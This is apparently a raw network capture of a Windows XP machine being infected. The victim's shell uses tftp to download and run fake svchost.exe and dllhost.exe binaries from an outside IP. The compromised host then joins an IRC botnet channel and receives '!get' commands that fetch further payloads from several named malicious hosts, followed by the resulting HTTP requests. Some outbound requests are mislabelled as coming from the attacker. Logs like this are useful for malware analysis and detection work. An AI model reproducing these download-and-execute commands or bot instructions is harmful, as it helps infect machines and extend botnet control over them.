VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
VICTIM: C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is 3CF1-1DE8
VICTIM: Directory of C:\\WINDOWS\\system32\\wins
VICTIM: File Not Found
VICTIM: C:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
VICTIM: Volume Serial Number is 3CF1-1DE8
VICTIM: Directory of C:\\WINDOWS\\system32\\dllcache
VICTIM: File Not Found
VICTIM: C:\\WINDOWS\\system32>
VICTIM: tftp -i 39.116.72.4 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: Transfer successful: 29184 bytes in 9 seconds, 3242 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 39.116.72.4 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: Transfer successful: 19968 bytes in 7 seconds, 2852 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK bucbjwvu
VICTIM: USER h020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG bucbjwvu :!get http:/soulandmore.com/components/com_ag_google_analytics2/dir/index.php
ATTACKER: :u. PRIVMSG bucbjwvu :!get http:/joposdv.pl:9/pl.txt
ATTACKER: :u. PRIVMSG bucbjwvu :!get http:/hardertodetect.ru/kd289sdf.txt
ATTACKER: :u. PRIVMSG bucbjwvu :!get http:/141.136.27.220/clubg.exe
VICTIM: GET /components/com_ag_google_analytics2/dir/index.php HTTP/1.0
VICTIM: User-Agent: Download
VICTIM: Host: soulandmore.com
VICTIM: Pragma: no-cache
ATTACKER: GET /pl.txt HTTP/1.0
ATTACKER: User-Agent: Download
ATTACKER: Host: joposdv.pl:9
ATTACKER: Pragma: no-cache
ATTACKER: GET /jiba.asp HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: GET /aack.txt HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /kd289sdf.txt HTTP/1.0
ATTACKER: User-Agent: Download
ATTACKER: Host: hardertodetect.ru
ATTACKER: Pragma: no-cache
ATTACKER: GET /ck.txt HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /park/check.asp HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: ga.9kusddaily.com:88
ATTACKER: GET /waplyj.txt HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /alitr3.txt HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /afei.txt HTTP/1.0
ATTACKER: User-Agent: CA 0.0.0.2
ATTACKER: Host: joposdv.pl:9
ATTACKER: Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0
ATTACKER: Accept: */*
ATTACKER: User-Agent: CryptRetrieveObjectByUrl::InetSchemeProvider
ATTACKER: Host: www.download.windowsupdate.com
ATTACKER: Connection: Keep-Alive
ATTACKER: Pragma: no-cache